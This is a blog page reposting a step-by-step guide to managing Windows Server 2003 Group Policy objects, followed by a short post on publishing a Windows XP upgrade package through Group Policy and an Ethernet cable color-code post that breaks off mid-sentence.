The example companies, organizations, products, domain names, e-mail addresses, logos, people, places, and events depicted herein are fictitious. No association with any real company, organization, product, domain name, e-mail address, logo, person, places, or events is intended or should be inferred.

This common infrastructure is designed for use on a private network. The fictitious company name and Domain Name Service (DNS) name used in the common infrastructure are not registered for use on the Internet. You should not use this name on a public network or Internet.

The Active Directory service structure for this common infrastructure is designed to show how Windows Server 2003 Change and Configuration Management works and functions with Active Directory. It was not designed as a model for configuring Active Directory for any organization.

Top of page

Overview

Group Policy settings define the various components of the user’s desktop environment that a system administrator needs to manage, for example, the programs that are available to users, the programs that appear on the user’s desktop, and options for the Start menu. Group Policy settings that you specify are contained in a Group Policy object (GPO), which in turn is associated with selected Active Directory objects—sites, domains, or organizational units (OUs).

Group Policy applies not only to users and client computers, but also to member servers, domain controllers, and any other Windows Server 2003 computers within the scope of management. By default, Group Policy that is applied to a domain (that is, applied at the domain level just above the root of Active Directory Users and Computers) affects all computers and users in the domain. Active Directory Users and Computers also provides a built-in Domain Controllers OU. If you keep your domain controller accounts there, you can use the GPO Default Domain Controllers Policy to manage domain controllers separately from other computers.

GPOs are linked to site, domain, and OU containers in Active Directory. The default order of precedence follows the hierarchical nature of Active Directory: sites are first, then domains, and then each OU. A GPO can be associated with more than one Active Directory container, or multiple containers can be linked to a single GPO.

A GPO can be used to filter objects based on security group membership, which allows administrators to manage computers and users in either a centralized or a de-centralized manner. To do this, administrators can use filtering based on security groups to define the scope of Group Policy management, so that Group Policy can be applied centrally at the domain level. Or, it can be applied in a decentralized manner at the OU level and can then be filtered again by security groups. Administrators can use security groups in Group Policy to:

•	Filter the scope of a GPO. This defines which groups of users and computers a GPO affects.
•	Delegate control of a GPO. There are two aspects to managing and delegating Group Policy: managing the Group Policy links and managing who can create and edit GPOs.

Several administrative tools are available for the management of Group Policy settings including:

•	Group Policy Object Editor Microsoft Management Console (MMC) snap-in•Default MMC snap-in available in Windows Server 2003 and the one used throughout this step-by-step guide.
•	Group Policy Management Console (GPMC) with Service Pack 1•GPMC extends the default Group Policy Object Editor by simplifying the management of Group Policy, making it easier to understand, deploy, manage, and troubleshoot Group Policy implementations. GPMC also enables automation of Group Policy operations via scripting. For more information, see the Step-by-Step Guide to Using the Group Policy Management Console.
•	Third-party extensions, which host other policy settings

Group Policy includes policy settings for User Configuration, which affect users, and for Computer Configuration, which affect computers.

With Group Policy, you can do the following:

•	Manage registry-based policy with Administrative Templates. Group Policy creates a file that contains registry settings that are written to the User or Local Machine portion of the registry database.
•	Assign scripts. This includes scripts such as computer startup, shutdown, logon, and logoff.
•	Redirect folders. You can redirect folders, such as My Documents and My Pictures, from the Documents and Settings folder on the local computer to network locations.
•	Manage applications. You can assign, publish, update, or repair applications by using Group Policy Software Installation.
•	Specify security options.

This document presents a brief overview of Group Policy, and shows how to use the Group Policy snap-in to specify policy settings for groups of users and of computers.

Prerequisites

•	Part 1: Installing Windows Server 2003 as a Domain Controller
•	Step by Step Guide to Managing Active Directory

Guide Requirements

Note:  This document does not describe all the possible Group Policy scenarios. This instruction set should be used to help you begin to understand how Group Policy works and begin to think about how your organization might use Group Policy to reduce its IT administration costs. Other Windows Server 2003 features, including Security Settings and Software Installation and Maintenance, are built on Group Policy. For a comprehensive list of available documents, see the Group Policy in Windows Server 2003 Web site.

Top of page

Group Policy and the Microsoft Management Console

Group Policy is directly integrated with Active Directory management tools through the MMC snap-in extension mechanism. The Active Directory snap-ins set the scope of management for Group Policy. The most common way to access Group Policy is by using the Active Directory User and Computers snap-in, for setting the scope of management to domain and OUs. You can also use the Active Directory Sites and Services snap-in to set the scope of management to a site. These two tools can be accessed from the Administrative Tools program group; the Group Policy snap-in extension is enabled in both tools. Alternatively, you can create a custom MMC console, as described in the next section.

Configuring a Custom Console

The examples in this document use the custom MMC console that you can create by following the procedures outlined in this section. You need to create this custom console before attempting the remaining procedures in this document.

To configure a custom console

1.	Log on to HQ-CON-DC-01 as administrator@contoso.com.
2.	Click the Start button, click Run, type mmc, and then click OK.
3.	In the Console1 window, click File, and then click Add/Remove Snap-in.
4.	In the Add/Remove Snap-in dialog box, click Add.
5.	In the Add Standalone Snap-in dialog box, in the Available standalone snap-ins list box, click Active directory users and computers, and then click Add.
6.	Double-click Active directory sites and services snap-in in the Available standalone snap-ins list box.
7.	Scroll down, and then double-click Group Policy Object Editor.
8.	In the Select Group Policy Object dialog box, ensure Local computer is selected under Group Policy Object. Click Finish, and then click Close.
9.	In the Add/Remove Snap-in dialog box, click the Extensions tab. Ensure that the Add all extensions check box is selected for each primary extension added to the MMC console (these are selected by default). Click OK.

To save console changes

1.	In the MMC console, click File, and then click Save.
2.	In the Save As dialog box, in the File name text box, type GPWalkThrough, and then click Save. The console should appear as shown in Figure 1.Figure 1.  Group Policy MMC Console

Accessing Group Policy

You can use the appropriate Active Directory tools to access Group Policy while focused on any site, domain, or OU.

To open Group Policy from Active Directory Sites and Services

1.	In the GPWalkthrough MMC console, in the console tree, click the plus sign (+) next to Active Directory Sites and Services.
2.	In the console tree, click the plus sign (+) next to Sites, and then right-click Default-First-Site-Name.
3.	Click Properties, and then click the Group Policy tab.
4.	Click Cancel.

To open Group Policy from Active Directory Users and Computers

1.	In the console tree in the GPWalkthrough MMC console, click the plus sign (+) next to Active Directory Users and Computers.
2.	In the console tree, right-click contoso.com to access Group Policy.
3.	Click Properties, and then click the Group Policy tab.
4.	Click Cancel.

To access Group Policy scoped to a specific computer (or the local computer), you must load the Group Policy snap-in into the MMC console namespace targeted at the specific computer (or local computer). There are two major reasons for these differences:

•	Sites, domains, and OUs can have multiple GPOs linked to them; these GPOs require an intermediate property page to manage them.
•	A GPO for a specific computer is stored on that computer, and not in Active Directory.

Creating a Group Policy Object

Group Policy settings are contained in GPOs that are individually linked to selected Active Directory objects, such as sites, domains, or OUs.

To create and link a new GPO to the Headquarters OU

1.	In the GPWalkThrough MMC, expand contoso.com under Active Directory Users and Computers.
2.	Click the plus sign (+) next to Accounts to expand the tree.
3.	Right-click Headquarters, and then click Properties.
4.	On the Headquarters Properties page, click the Group Policy tab.
5.	Click New, type HQ Policy, and then press Enter. The Headquarters Properties page appears as shown in Figure 2.Figure 2.  New GPO Linked to Headquarters OU

The previous steps showed how to create and automatically link a GPO to an Active Directory container—the Headquarters OU. However, the GPO will have no direct impact on users or computers until its various settings are defined. The next section shows how to edit the HQ Policy GPO settings.

Multiple GPOs may be created and/or linked under any Active Directory container. If more than one GPO is associated with an Active Directory container, you must ensure that the GPOs are ordered correctly. GPOs higher in the list that have the highest precedence are processed last. (This is what gives them a higher precedence.)

GPOs are objects; they have context menus for viewing the properties of each GPO. You can use the context menus to obtain and modify general information about a GPO. This information includes Discretionary Access Control Lists (DACLs), and lists the other site, domain, or OUs to which this GPO is linked.

Best Practice:  You can further refine a GPO through user or computer membership in security groups by setting DACLs based on that membership. For information about using DACLs, see the section Security Group Filtering.

Managing Group Policy

To manage Group Policy

•

Access the context menu of a site, domain, or OU

•

Select Properties, and then click the Group Policy tab. This displays the Group Policy Properties page.Note the following for the Group Policy Properties page.• This page displays any GPOs that have been associated with the currently selected site, domain, or OU. The links are objects; they have a context menu that you can access by right-clicking the object. (Right-clicking the white space displays a context menu for creating a new link, adding a link, or refreshing the list.) • This page also shows an ordered GPO list, with the highest priority GPO at the top of the list. You can change the list order by selecting a GPO, and then using the Up or Down arrow keys. • To associate (link) a GPO, click the Add button. • To edit an existing GPO in the list, select the GPO, and then click the Edit button, or double-click the GPO. This starts the Group Policy Object Editor, where you can modify the GPO. For more information about modifying GPOs, see Editing a Group Policy Object. • To permanently delete a GPO from the list, select it from the list, and then click the Delete button. When prompted, select Remove the link and delete the Group Policy object permanently. Be careful when deleting a GPO since it may be associated with another site, domain, or OU. If you only want to remove the GPO’s association with the current container, select the GPO from the links list, click Delete, and then, when prompted, select Remove the link from the list. • To determine what other sites, domains, or OUs are associated with a given GPO, right-click the GPO, select Properties on the context menu, and then click the Links tab on the GPO Properties page. Click Find Now to retrieve a current link list for this GPO. • By right-clicking the GPO, you can set the No override option. This option marks the selected GPO so that its policies cannot be overridden by another GPO. Note:  You can enable the No Override option on more than one GPO. All GPOs marked as No override will take precedence over all other GPOs that are not marked. Of those GPOs marked as No override, the GPO with the highest priority will be applied after all the other similarly marked GPOs. • By right-clicking the GPO, you can set the GPO as Disabled, which simply disables (deactivates) the GPO without removing it from the list. Note:  It is also possible to disable only the User or Computer portion of the GPO. To do this, right-click the GPO, click Properties, and then, on the General tab, click either Disable Computer Configuration settings or Disable User Configuration settings. • On the Active Directory container’s Group Policy properties page, you can set Block policy inheritance to negate all GPOs that exist higher in the hierarchy. However, it cannot block any GPOs that are enforced by using the No override check box; those GPOs will always be applied. Note:  Policy settings contained within the local GPO that are not specifically overridden by domain-based policy settings are also always applied. Block Policy Inheritance at any level will not remove local policy.

Editing a Group Policy Object

You can use the GPWalkThrough custom console created previously to edit a GPO.

To edit the HQ Policy GPO

1.	In the GPWalkThrough MMC console, double-click the HQ Policy GPO (or highlight it, and then click Edit). This opens the Group Policy Object Editor for editing the HQ Policy. It should appear as shown in Figure 3.Figure 3.  HQ Policy   See full-sized image
2.	Close the Group Policy Object Editor for the HQ Policy.

Adding or Browsing a Group Policy Object

To add a GPO

1.

In the Headquarters Properties page, on the Group Policy tab, click Add. The Add a Group Policy Object Link dialog box lists GPOs currently associated with Domains/OUs, sites, or all GPOs that exist within the Active Directory structure. Figure 4 illustrates this dialog box.Figure 4.  Add a Group Policy Object Link

Review the following components of the Add a Group Policy Object Link dialog box and then close the dialog box.

•	The Look in drop-down box allows you to navigate the entire Active Directory structure in search of a GPO. As you change the value in this box, GPOs and all child objects will be displayed in the results pane.
•	On the Domains/OUs tab, the list box displays the sub-OUs and GPOs for the currently selected domain or OU. To navigate the hierarchy, double-click a sub-OU or use the Up one level toolbar button.
•	On the Sites tab, all GPOs associated with the selected site are displayed. Use the drop-down list to select another site. There is no hierarchy of sites.
•	The All tab shows a flat list of all GPOs that are stored in the selected domain. This is useful when you want to select a GPO that you know by name, rather than where it is currently associated. This is also the only place to create a GPO that does not have a link to a site, domain, or OU.
•	To create an unlinked GPO on the All tab, select the Create New Group Policy Object toolbar button or right-click the white space, and then click New. Name the new GPO, click Enter, and then click Cancel—do not click OK. Clicking OK links the new GPO to the current site, domain, or OU. Clicking Cancel creates an unlinked GPO.
•	To associate a GPO with the currently selected domain or OU, double-click the desired GPO.

Note:  It is possible to have two or more GPOs with the same name. This is by design and is possible because GPOs are actually stored as globally unique identifiers (GUIDs). The display name shown is actually a friendly name stored in Active Directory.

Registry-Based Policies

The user interface for registry-based policies is available through Administrative Template (.adm) files. These files describe the user interface that is displayed in the Administrative Templates node of the Group Policy snap-in. These files are format-compatible with the .adm files used by the System Policy Editor tool (Poledit.exe) in Microsoft Windows NT^® 4.0. With Windows Server 2003, the options available in registry-based policies have been expanded.

Note:  Although it is possible to add any .adm file to a GPO, if you use an .adm file from a previous version of Windows, the registry keys are unlikely to have an effect on Windows Server 2003.

By default, only those policy settings defined in the loaded .adm files that exist in the approved Group Policy trees are displayed; these settings are referred to as true policies. This means that the Group Policy snap-in does not display any items described in the .adm file that set registry keys outside of the Group Policy trees; such items are referred to as Group Policy preferences. Preferences are indicated by a red icon to distinguish them from true policies, which are indicated by a blue icon. The approved Group Policy trees are:

•	\Software\Policies
•	\Software\Microsoft\Windows\CurrentVersion\Policies

Note:  Using non-policies within the Group Policy infrastructure is strongly discouraged because of the persistent registry settings behavior mentioned previously. To set registry policies on Windows NT 4.0, and Windows 95 and Windows 98 clients, use the Windows NT 4.0 System Policy Editor tool, Poledit.exe.

By default, the conf.adm, inetres.adm, system.adm, wmplayer.adm, and wuau.adm files are loaded and available for configuration as shown in Figure 5.

Figure 5.  User Configuration

The default .adm files offer the following configuration options.

•	Conf.adm: NetMeeting settings
•	Inetres.adm: Internet Explorer settings
•	System.adm: Operating System settings
•	wmplayer.adm: Windows Media Player settings
•	wuau.adm: Windows Update settings

Adding Administrative Templates

Administrative Templates (.adm files) contain a hierarchy of categories and subcategories that together define how options are organized in the Group Policy user interface.

To add an administrative template (.adm files)

1.	On the Headquarters Properties page, double-click the HQ Policy GPO.
2.	Under either User Configuration or Computer Configuration, right-click Administrative Templates, and then click Add/Remove Templates. This shows a list of the currently active template files for this Active Directory container.
3.	Click Add. This shows a list of the available .adm files in the %systemroot%\inf directory of the computer where Group Policy is being run. You can choose an .adm file from another location. Once chosen, the .adm file will be available for configuration within the GPO.
4.	Click Cancel, and then click Close. (No Administrative Templates will be added in these exercises.)

Configuring Administrative Templates

The following steps provide a simple example of using Administrative Templates to remove the Run command from a user’s desktop. You should become familiar with all the available settings offered in the Administrative Templates. Additional step-by-step guides in this series will use settings available in the Administrative Templates.

To set registry-based settings using administrative templates

1.	In the Group Policy Object Editor for the HQ Policy GPO, click the plus sign (+) next to the Administrative Templates in the User Configuration node.
2.	Click Start Menu & Taskbar. Note that the details pane shows all policies as Not configured.
3.	In the right pane, double-click the Remove Run menu from Start menu policy.
4.	In the Remove Run menu from Start menu dialog box, click Enabled (as shown in Figure 6). Click OK to finish.Figure 6.  Remove Run menu from Start Menu

Note the Previous Policy and Next Policy buttons in the dialog box. You can use these buttons to navigate the details pane for setting the state of other policies. You can also leave the dialog box open and click another policy in the details pane of the Group Policy snap-in. After the details pane has the focus, you can use the Up and Down arrow keys on the keyboard and press Enter to quickly browse through the settings (or Explain tabs) for each policy in the selected node.

Note the change in state to Enabled in the Setting column of the details pane. This change is immediate; it has been saved to the GPO. If you are in a replicated domain controller environment, this action sets a flag that triggers a replication cycle.

If you log on to a workstation in the contoso.com domain with a user from the Headquarters OU, you will note that the Run menu has been removed.

Note:  At this point, you may want to experiment with the other available policies. Look at the text in the Explain tab for information about each policy.

Deploying Scripts Through Group Policy Objects

You can define a GPO setting that runs scripts when users log on or log off, or when the system starts or shuts down. All scripts are Windows Scripting Host (WSH)–enabled. As such, they may include Java Scripts or Microsoft Visual Basic^® Scripts, as well as .bat and .cmd files.

Creating a Logon Script

Note:  This procedure uses the welcome.js script described in the Appendix. Create an Included Items folder, and then create the file welcome.js within the Included Items folder by copying the script from the Appendix in this guide.

To define a logon script Group Policy setting

1.	Close the Group Policy Object Editor for the HQ Policy.
2.	In the Headquarters Properties dialog box, click Close.
3.	In the GPWalkthrough console, right-click the contoso.com domain, click Properties, and then click the Group Policy tab.
4.	On the Group Policy properties page, select the Default Domain Policy GPO from the Group Policy objects links list, and then click Edit to open the Group Policy Object Editor snap-in.
5.	In the Group Policy snap-in, under User Configuration, click the plus sign (+) next to Windows Settings, and then click the Scripts (Logon/Logoff) node.
6.	In the details pane, double-click Logon.The Logon Properties dialog box displays the list of scripts that run when a designated user logs on. This is an ordered list, with the script that is to run first appearing at the top of the list. You can change the order by selecting a script, and then using the Up or Down arrow keys.To add a new script to the list, click the Add button. This displays the Add a Script dialog box. Browsing from this dialog box allows you to specify the name of an existing script located in the current GPO, or to browse to another location and select it for use in this GPO. The script file must be accessible to the user at logon, or it does not run. Scripts in the current GPO are automatically available to the user. To create a new script, right-click the empty space, select New, and then select a new file. To edit the name or the parameters of an existing script in the list, select it, and then click the Edit button. This button does not allow the script itself to be edited. To edit the script, use the Show Files button. To remove a script from the list, select it, and then click Remove. The Show Files button displays a Windows Explorer view of the scripts for the GPO. This allows quick access to these files or to the place to copy support files to if the script files require them. If you change a script file name from this location, you must also use the Edit button to change the file name, or the script cannot execute. Note:  If the View Folder Options for this folder are set to Hide file extensions for known file types, the file may have an unwanted extension that prevents it from being run.
7.	Click the Start button, click All Programs, click Accessories, and then click Windows Explorer. Navigate to the welcome2000.js file in the Included Items directory, right-click the file, and then click Copy.
8.	Close Windows Explorer.
9.	In the Logon Properties dialog box, click the Show Files button, and paste the welcome.js script into the default file location. It should appear as shown in Figure 7.Figure 7.  Welcome.js Script Included in the Default Domain Policy  See full-sized image
10.	Close the window containing welcome.js.
11.	In the Logon Properties dialog box, click Add.
12.	In the Add a Script dialog box, click Browse. In the Browse dialog box, double-click the welcome.js file.
13.	In the Add a Script dialog box, click OK (no script parameters are needed), and then click OK again.
14.	Close the Group Policy Object Editor.
15.	On the contoso.com Properties page, click Cancel.

This script will be immediately available to any member of contoso.com since it was defined within the Default Domain Policy. You can log on to a client workstation to verify that the script is run when a user logs on.

Defining a Logoff or Computer Startup or Shutdown Script

You can use the same procedure outlined in the section Creating a Logon Script to set up scripts that run when a user logs off or when a computer starts or shuts down. For logoff scripts, you would select Logoff in step 6 in Creating a Logon Script. For computer Startup or Shutdown scripts, switch to Computer Configuration – Windows Settings – Scripts (Startup/Shutdown) in the Group Policy Object Editor.

Other Script Considerations

By default, Group Policy scripts that run in a command window (such as .bat or .cmd files) run hidden, and legacy scripts (those defined in the user object) are, by default, visible as they are processed, although there is a Group Policy setting that allows this visibility to be changed. The policy for users is called Run logon scripts visible or Run logoff scripts visible, and is accessed in the User Configuration\Administrative Templates node, under System\Scripts. For computers, the policy is Run startup scripts visible and Run shutdown scripts visible, and can be accessed in the Computer Configuration\Administrative Templates node, under System\Scripts.

Security Group Filtering

You can refine the effects of any GPO on users or computers by stipulating how a selected GPO is applied to security groups. To do this, use the Security tab on the Properties page of a GPO to set DACLs. DACLs are used primarily for performance reasons, although the feature allows for tremendous flexibility in designing and deploying GPOs, and the policies they contain.

By default, GPOs affect all users and machines that are contained in the linked site, domain, or OU. By using DACLs, the effect of any GPO can be modified to exclude or include the members of any security group.

To filter GPO application based on Security Group membership

1.	In the GPWalkthrough console, under the Accounts OU, right-click the Headquarters OU, and then click Properties.
2.	In the Headquarters Properties dialog box, click the Group Policy tab.
3.	Right-click the HQ Policy GPO in the Group Policy Object Links list, and then select Properties from the context menu.
4.	On the Properties page, click the Security tab.
5.	On the Security property page, click Add.
6.	In the Select Users, Computers, and Groups dialog box, type Management in the Enter the object names to select, and then click OK.
7.	In the Security tab on the HQ Policy Properties page, select the Management group, and view the permissions.Note:  By default, only the Read Access Control Entry (ACE) is set to Allow for the Management group. This means that the members of the Management group do not have this GPO applied to them unless they are also members of another group (by default, they are also Authenticated Users) that has the Apply Group Policy ACE selected.At this point, everyone in the Authenticated Users group has this GPO applied including members of the Management Security Group as shown in Figure 8. Figure 8.  Authenticated Users

To configure the GPO to apply only to members of the Management group

1.	Select the Allow check box for the Apply Group Policy ACE for the Management group.
2.	Clear the Allow check box for the Allow Group Policy ACE for the Authenticated Users group.Note:  By changing the ACEs that are applied to different groups, administrators can customize how a GPO affects the users or computers that are subject to that GPO. Write access is required for modifications to be made; Read and Allow Group Policy ACEs are required for a policy to be applied to the group.

To deny GPO application to members of the Management group

Note:  Use the Deny ACE with caution. A Deny ACE setting for any group has precedence over any Allow ACE given to a user or computer because of membership in another group. For more information about this interaction, see the Windows 2000 Server online Help and search for Security Group.

1.	Clear the Allow check box and select the Deny check box for the Apply Group Policy ACE for the Management group.
2.	Select the Allow check box for the Allow Group Policy ACE for the Authenticated Users group.Figure 9 shows an example of the security settings that allow everyone to be affected by this GPO, except the members of the Management group, who are explicitly denied permission to the GPO. If a member of the Management group were also a member of a group that had an explicit Allow setting for the Apply Group Policy ACE, the Deny setting would take precedence and the GPO would not affect the user.Figure 9.  Deny GPO Assignment Based on Group Membership
3.	Click OK and then click Yes to acknowledge the warning about using Deny ACLs.
4.	Click OK to close the Headquarters Property page.

Variations on this procedure may include:

•	Adding additional GPOs with different sets of policies and having them apply only to groups other than the Management group.
•	Creating another group with members of the existing groups in them, and then using those groups as filters for a GPO.

Note:  You can use these same types of security options with the Logon scripts you set up in the preceding section. You can set a script to run only for members of a particular group or for everyone except the members of a specific group.

Security group filtering has two functions: the first is to modify which group is affected by a particular GPO, and the second is to delegate which group of administrators can modify the contents of the GPO by restricting Full Control to a limited set of administrators (by a group). This is recommended because it limits the chance of multiple administrators making changes at any one time.

Policy Inheritance

In general, Group Policy is passed down from parent to child containers within a domain. Group Policy is not inherited from parent to child domains. If you assign a specific Group Policy setting to a high-level parent container, that Group Policy setting applies to all containers beneath the parent container, including the user and computer objects in each container. However, if you explicitly specify a Group Policy setting for a child container, the child container’s Group Policy setting overrides the parent container’s setting.

If a parent OU has policy settings that are not configured, the child OU does not inherit them. Policy settings that are disabled are inherited as disabled. In addition, if a policy setting is configured (enabled or disabled) for a parent OU and the same policy setting is not configured for a child OU, the child inherits the parent’s enabled or disabled policy setting.

If a policy setting that is applied to a parent OU and a policy setting that is applied to a child OU are compatible, the child OU inherits the parent policy setting, and the child’s setting is also applied.

If a policy setting that is configured for a parent OU is incompatible with the same policy setting that is configured for a child OU (because the setting is enabled in one case and disabled in the other), the child does not inherit the policy setting from the parent. The policy setting in the child is applied.

Blocking Inheritance and No Override

The Block Policy inheritance option blocks GPOs that apply higher in the Active Directory hierarchy of sites, domains, and OUs. It does not block GPOs if they have No Override enabled. The Block Policy inheritance option is set only on sites, domains, and OUs, not on individual GPOs. These settings provide complete control over the default inheritance rules.

In the following section, you set up a GPO in the Accounts OU, which applies by default to the users (and computers) in all child objects within the Accounts OU. You then establish another GPO in the Accounts OU and set it as No override. These settings will apply to all child objects even if settings conflict with other settings applied through a GPO. You will then use the Block inheritance feature to prevent group policies set in a parent site, domain, or OU (in this case, the Accounts OU) from being applied to the Production OU.

To create new GPOs

1.	In the GPWalkthrough MMC and under contoso.com, right-click the Accounts OU.
2.	Click Properties, and then click the Group Policy tab.
3.	Click New, enter Default User Policies for the GPO name, and then press Enter.
4.	Click New again, enter Enforced User Policies for the GPO name, and then press Enter.
5.	Click the Enforced Users Policies GPO, and then click the Up button to move it to the top of the list.Note:  The Enforced Users Policies GPO should have the highest precedence. Note that this step only serves to demonstrate the functionality of the Up button; an enforced GPO always takes precedence over those that are not enforced.
6.	Select the No override setting for the Enforced User Policies GPO by double-clicking the No override column or using the Options button. The Accounts Properties page should now appear as in Figure 10.Figure 10. Enforced User Policies with No Override

To enable settings in the Enforced User Policies and Default User Policies GPOs

1.	On the Accounts Properties page, double-click the Enforced User Policies GPO.
2.	In the Group Policy Object Editor, under User Configuration, expand Administrative Templates.
3.	Expand System, and then click Ctrl+Alt+Del Options.
4.	In the details pane, double-click the Remove Task Manager policy, click Enabled in the Remove Task Manager dialog box, and then click OK. For more information about the policy, click the Explain tab. The setting is now Enabled as shown in Figure 11.Figure 11.  Disabling the Use of Task Manager
5.	Click File, and then click Exit to close the Group Policy Object Editor.
6.	In the Accounts Properties dialog box, on the Group Policy tab, double-click the Default User Policies GPO in the Group Policy objects links list.
7.	In the Group Policy Object Editor, under User Configuration, expand Administrative Templates, expand Desktop, and then click Active Desktop.
8.	In the details pane, double-click the Disable Active Desktop policy.
9.	Click Enabled, click OK, and then click OK.
10.	Click File, and then click Exit to close the Group Policy Object Editor.

Logging on to a client workstation as any user under the Accounts OU, including child OUs, will apply both the Default User and Enforced User GPOs. Both Task Manager and the Active Desktop will be disabled.

Increasing the Performance of GPOs

Because these GPOs are used solely for user configuration, the computer portion of the GPO can be disabled. Disabling the computer configuration settings reduces the target computer’s startup time as the computer GPOs do not need to be evaluated.

If no computers exist within the Accounts, or any child OUs, disabling the computer portion of the GPO has no immediate benefit. However, since these GPOs could later be linked to a different container that may include computers, you may want to disable the computer side of these GPOs.

To disable the computer portion of a GPO

1.	In the Accounts Properties dialog box, right-click the Enforced User Policies GPO, and then select Properties.
2.	In the Enforced User Policies Properties dialog box, click the General tab (default), and then select the Disable computer configuration settings check box. In the Confirm Disable dialog box, click Yes, and then click OK to finish.Note that the General properties page includes two check boxes for disabling a portion of the GPO.
3.	Repeat steps 1 and 2 for the Default Users Policies GPO.

Blocking Inheritance

You can block inheritance so that one GPO does not inherit policy from another GPO in the hierarchy. The following example shows how to block inheritance so that only the settings in the Enforced User Policies affect the users in this OU.

To block inheritance of Group Policy for the Production OU

1.	In the Accounts Properties dialog box, click Close.
2.	Under the Accounts OU in the GPWalkThrough console, right-click the Production OU, select Properties on the context menu, and then click the Group Policy tab.
3.	Select the Block Policy inheritance check box, and then click OK.

To verify that inherited settings are now blocked, you can log on as any user in the Production OU. Note that the Active Desktop is available, however, the Task Manager remains disabled since its disabling GPO was set to No Override in the parent OU.

Linking a GPO to Multiple Sites, Domains, and OUs

This section demonstrates how you can link a GPO to more than one container (site, domain, or OU) in Active Directory. Depending on the exact OU configuration, you can use other methods to achieve similar Group Policy effects; for example, you can use security group filtering or you can block inheritance. In some cases, however, those methods do not have the desired affects. Whenever you need to explicitly state which sites, domains, or OUs need the same set of policies, use the following method.

To link a GPO to multiple sites, domains, and OUs

1.	Under the Accounts OU in the GPWalkThrough console, right-click the Headquarters OU, select Properties on the context menu, and then click the Group Policy tab.
2.	In the Headquarters Properties dialog box, on the Group Policy tab, click New to create a new GPO named Linked Policies.
3.	Select the Linked Policies GPO, and then click Edit.
4.	In the Group Policy Object Editor, under User Configuration and Administrative Templates, click Control Panel, and then click Display.
5.	On the details pane, double-click the Prevent changing wallpaper policy, and then click Enabled. Click OK to continue.
6.	Click File, and then click Exit to close the Group Policy Object Editor.
7.	In the Headquarters Properties page, click Close.
8.	Under the Accounts OU in the GPWalkThrough console, right-click the Production OU, click Properties on the context menu, and then click the Group Policy tab on the Production Properties dialog box.
9.	Click Add, or right-click the blank area of the Group Policy objects links list, and select Add on the context menu.
10.	In the Add a Group Policy Object Link dialog box, click the down arrow on the Look in box, and select the Accounts.contoso.com OU.
11.	Double-click the Headquarters.Accounts.contoso.com OU in the Domains, OUs, and linked Group Policy objects list.
12.	Click the Linked Policies GPO, and then click OK.
13.	Click OK to finish.

You have now linked a single GPO to two OUs. Changes made to the GPO in either location result in a change for both OUs.

Loopback Processing

Loopback provides alternatives to the default method of obtaining the ordered list of GPOs whose User Configuration settings affect a user. By default, a user’s settings come from a GPO list that depends on the user’s location in Active Directory. The ordered list goes from site-linked to domain-linked to OU–linked GPOs, with inheritance determined by the location of the user in Active Directory and in an order that is specified by the administrator at each level.

Loopback can be set to Not Configured, Enabled, or Disabled, as can any other Group Policy setting. In the Enabled state, loopback can be set to Merge or Replace.

•	Loopback with Replace  The GPO list for the user is replaced in its entirety by the GPO list that is already obtained for the computer at computer startup. The User Configuration settings from this list are applied to the user.
•	Loopback with Merge  The GPO list is a concatenation. The default GPOs for computers is appended to the default GPOs for users, and the user gets the User Configuration settings in the concatenated list. Note that the GPO list that is obtained for the computer is applied later and, therefore, it has precedence if it conflicts with settings in the user’s list.

To enable Loopback processing

1.	Expand  the Resources OU in the GPWalkThrough console, right-click the Desktop OU, click Properties on the context menu, and then click the Group Policy tab in the Desktop Properties dialog box.
2.	Click New to create a new GPO named Loopback Policies.
3.	Select the Loopback Policies GPO, and then click Edit.
4.	In the Group Policy Object Editor, in the Computer Configuration node, expand Administrative Templates, expand System, and then click Group Policy.
5.	In the details pane, double-click the User Group Policy loopback processing mode policy.
6.	Click Enabled in the User Group Policy loopback processing mode dialog box, select Replace (default) in the Mode drop-down list, and then click OK.

March 4, 2008 Posted by jim11 | Uncategorized | Leave a Comment

How to Create a Network Share

How to Create a Network Share

Create a folder to hold the Windows Installer package (Winnt32.msi) on a network server, give the folder the correct permissions to permit the users and the computers to read and run the files, and then copy the I386 folder from the Windows XP Professional CD-ROM to this folder.

How to Create a Group Policy Object (GPO)

You can create a GPO for a domain, an organizational unit, or a site. Microsoft recommends that you assign a GPO to an organizational unit that contains the users whose workstations you want to upgrade. To create a GPO:

1.	Click Start, point to Administrative Tools, and then click Active Directory Users and Computers.
2.	Right-click the container that you want to link the GPO to, and then click Properties.
3.	Click the Group Policy tab, click New, and then type a name for the new GPO in the New Group Policy Object box.
4.	Click the GPO that you created in step 3, and then click Edit.
5.	Expand User Configuration, and then expand Software Settings.
6.	Right-click Software installation, point to New, and then click Package.
7.	In the Look in box, locate the share that contains the I386 folder. Make sure that the path that you enter is an accessible Universal Naming Convention (UNC) path and not a file system path.
8.	Open the share that contains the Windows Installer package, click Winnt32.msi, and then click Open.
9.	Click Publish, and then click OK.

March 4, 2008 Posted by jim11 | Uncategorized | Leave a Comment

ETHERNET CABLE

ETHERNET CABLE: COLOR-CODE STANDARDS The information listed here is to assist Network Administrators in the color coding of Ethernet cables. Please be aware that modifying Ethernet cables improperly may cause loss of network connectivity. Use this information at your own risk, and insure all connectors and cables are modified in accordance with standards. The Internet Centre and its affiliates cannot be held liable for the use of this information in whole or in part. T-568A Straight-Through Ethernet Cable The TIA/EIA 568-A standard which was ratified in 1995, was replaced by the TIA/EIA 568-B standard in 2002 and has been updated since. Both standards define the T-568A and T-568B pin-outs for using Unshielded Twisted Pair cable and RJ-45 connectors for Ethernet connectivity. The standards and pin-out specification appear to be related and interchangeable, but are not the same and should not be used interchangeably. T-568B Straight-Through Ethernet Cable Both the T-568A and the T-568B standard Straight-Through cables are used most often as patch cords for your Ethernet connections. If you require a cable to connect two Ethernet devices directly together without a hub or when you connect two hubs together, you will need to use a Crossover cable instead. RJ-45 Crossover Ethernet Cable A good way of remembering how to wire a Crossover Ethernet cable is to wire one end using the T-568A standard and the other end using the T-568B standard. Another way of remembering the color coding is to simply switch the Green set of wires in place with the Orange set of wires. Specifically, switch the solid Green (G) with the solid Orange, and switch the green/white with the orange/white. Ethernet Cable Instructions: Pull the cable off the reel to the desired length and cut. If you are pulling cables through holes, its easier to attach the RJ-45 plugs after the cable is pulled. The total length of wire segments between a PC and a hub or between two PC’s cannot exceed 100 Meters (328 feet) for 100BASE-TX and 300 Meters for 10BASE-T. Start on one end and strip the cable jacket off (about 1″) using a stripper or a knife. Be extra careful not to nick the wires, otherwise you will need to start over. Spread, untwist the pairs, and arrange the wires in the order of the desired cable end. Flatten the end between your thumb and forefinger. Trim the ends of the wires so they are even with one another, leaving only 1/2″ in wire length. If it is longer than 1/2″ it will be 